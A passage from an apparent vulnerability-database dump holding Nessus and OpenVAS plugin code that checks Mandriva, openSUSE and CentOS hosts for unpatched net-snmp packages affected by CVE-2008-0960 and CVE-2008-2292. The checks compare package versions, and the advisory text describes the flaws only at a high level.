yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"net-snmp-mibs-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"net-snmp-trapd-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"net-snmp-utils-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"perl-NetSNMP-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64net-snmp-devel-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64net-snmp-static-devel-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64net-snmp15-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libnet-snmp-devel-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libnet-snmp-static-devel-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libnet-snmp15-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"net-snmp-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"net-snmp-mibs-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"net-snmp-trapd-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"net-snmp-utils-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"perl-NetSNMP-5.4.1-1.1mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64net-snmp-devel-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64net-snmp-static-devel-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64net-snmp15-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libnet-snmp-devel-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libnet-snmp-static-devel-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libnet-snmp15-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"net-snmp-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"net-snmp-mibs-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"net-snmp-tkmib-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"net-snmp-trapd-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"net-snmp-utils-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"perl-NetSNMP-5.4.1-5.1mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:32", "description": "This security update fixes a denial of service vulnerability and an\nauthentication bypass (CVE-2008-2292, CVE-2008-0960).", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : libsnmp15 (libsnmp15-87)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:perl-SNMP", "p-cpe:/a:novell:opensuse:net-snmp-devel", "p-cpe:/a:novell:opensuse:net-snmp", "p-cpe:/a:novell:opensuse:snmp-mibs", "p-cpe:/a:novell:opensuse:libsnmp15", "p-cpe:/a:novell:opensuse:net-snmp-32bit"], "id": "SUSE_11_0_LIBSNMP15-080706.NASL", "href": "https://www.tenable.com/plugins/nessus/40045", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libsnmp15-87.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40045);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n\n script_name(english:\"openSUSE Security Update : libsnmp15 (libsnmp15-87)\");\n script_summary(english:\"Check for the libsnmp15-87 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update fixes a denial of service vulnerability and an\nauthentication bypass (CVE-2008-2292, CVE-2008-0960).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=393159\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libsnmp15 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsnmp15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:net-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:net-snmp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:net-snmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-SNMP\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:snmp-mibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libsnmp15-5.4.1-77.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"net-snmp-5.4.1-77.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"net-snmp-devel-5.4.1-77.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"perl-SNMP-5.4.1-77.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"snmp-mibs-5.4.1-77.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"net-snmp-32bit-5.4.1-77.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsnmp15 / net-snmp / net-snmp-32bit / net-snmp-devel / perl-SNMP / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:25:20", "description": "Updated net-snmp packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Simple Network Management Protocol (SNMP) is a protocol used for\nnetwork management.\n\nA flaw was found in the way Net-SNMP checked an SNMPv3 packet's\nKeyed-Hash Message Authentication Code (HMAC). An attacker could use\nthis flaw to spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n\nA buffer overflow was found in the Perl bindings for Net-SNMP. This\ncould be exploited if an attacker could convince an application using\nthe Net-SNMP Perl module to connect to a malicious SNMP agent.\n(CVE-2008-2292)\n\nAll users of net-snmp should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.", "edition": 28, "published": "2008-06-12T00:00:00", "title": "CentOS 3 / 4 / 5 : net-snmp (CESA-2008:0529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2008-06-12T00:00:00", "cpe": ["p-cpe:/a:centos:centos:net-snmp-utils", "p-cpe:/a:centos:centos:net-snmp-libs", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:net-snmp-perl", "p-cpe:/a:centos:centos:net-snmp", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:net-snmp-devel", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2008-0529.NASL", "href": "https://www.tenable.com/plugins/nessus/33142", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0529 and \n# CentOS Errata and Security Advisory 2008:0529 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33142);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n script_bugtraq_id(29212, 29623);\n script_xref(name:\"RHSA\", value:\"2008:0529\");\n\n script_name(english:\"CentOS 3 / 4 / 5 : net-snmp (CESA-2008:0529)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated net-snmp packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Simple Network Management Protocol (SNMP) is a protocol used for\nnetwork management.\n\nA flaw was found in the way Net-SNMP checked an SNMPv3 packet's\nKeyed-Hash Message Authentication Code (HMAC). An attacker could use\nthis flaw to spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n\nA buffer overflow was found in the Perl bindings for Net-SNMP. This\ncould be exploited if an attacker could convince an application using\nthe Net-SNMP Perl module to connect to a malicious SNMP agent.\n(CVE-2008-2292)\n\nAll users of net-snmp should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/014970.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6ce0318a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/014971.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d46f8e65\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/014980.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0b76e169\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/014983.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ce8c587\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/015014.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e04fe41\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/015015.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b05a3829\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/015040.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7dcbf0ab\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/015041.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?170e07e5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected net-snmp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:net-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:net-snmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:net-snmp-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:net-snmp-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:net-snmp-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/05/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/06/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"net-snmp-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"net-snmp-devel-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"net-snmp-libs-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"net-snmp-perl-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"net-snmp-utils-5.0.9-2.30E.24\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"net-snmp-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"net-snmp-5.1.2-11.c4.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"net-snmp-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"net-snmp-devel-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"net-snmp-devel-5.1.2-11.c4.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"net-snmp-devel-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"net-snmp-libs-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"net-snmp-libs-5.1.2-11.c4.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"net-snmp-libs-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"net-snmp-perl-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"net-snmp-perl-5.1.2-11.c4.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"net-snmp-perl-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"net-snmp-utils-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"net-snmp-utils-5.1.2-11.c4.11.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"net-snmp-utils-5.1.2-11.el4_6.11.3\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"net-snmp-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"net-snmp-devel-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"net-snmp-libs-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"net-snmp-perl-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"net-snmp-utils-5.3.1-24.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"net-snmp / net-snmp-devel / net-snmp-libs / net-snmp-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-25T10:56:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "Check for the Version of net-snmp", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880145", "href": "http://plugins.openvas.org/nasl.php?oid=880145", "type": "openvas", "title": "CentOS Update for net-snmp CESA-2008:0529 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for net-snmp CESA-2008:0529 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Simple Network Management Protocol (SNMP) is a protocol used for\n network management.\n\n A flaw was found in the way Net-SNMP checked an SNMPv3 packet's Keyed-Hash\n Message Authentication Code (HMAC). An attacker could use this flaw to\n spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n \n A buffer overflow was found in the Perl bindings for Net-SNMP. This could\n be exploited if an attacker could convince an application using the\n Net-SNMP Perl module to connect to a malicious SNMP agent. (CVE-2008-2292)\n \n All users of net-snmp should upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"net-snmp on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/014971.html\");\n script_id(880145);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0529\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_name( \"CentOS Update for net-snmp CESA-2008:0529 centos3 x86_64\");\n\n script_summary(\"Check for the Version of net-snmp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-devel\", rpm:\"net-snmp-devel~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-libs\", rpm:\"net-snmp-libs~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-perl\", rpm:\"net-snmp-perl~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-utils\", rpm:\"net-snmp-utils~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "Check for the Version of net-snmp", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880243", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880243", "type": "openvas", "title": "CentOS Update for net-snmp CESA-2008:0529 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for net-snmp CESA-2008:0529 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Simple Network Management Protocol (SNMP) is a protocol used for\n network management.\n\n A flaw was found in the way Net-SNMP checked an SNMPv3 packet's Keyed-Hash\n Message Authentication Code (HMAC). An attacker could use this flaw to\n spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n \n A buffer overflow was found in the Perl bindings for Net-SNMP. This could\n be exploited if an attacker could convince an application using the\n Net-SNMP Perl module to connect to a malicious SNMP agent. (CVE-2008-2292)\n \n All users of net-snmp should upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"net-snmp on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/015040.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880243\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0529\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_name( \"CentOS Update for net-snmp CESA-2008:0529 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of net-snmp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == 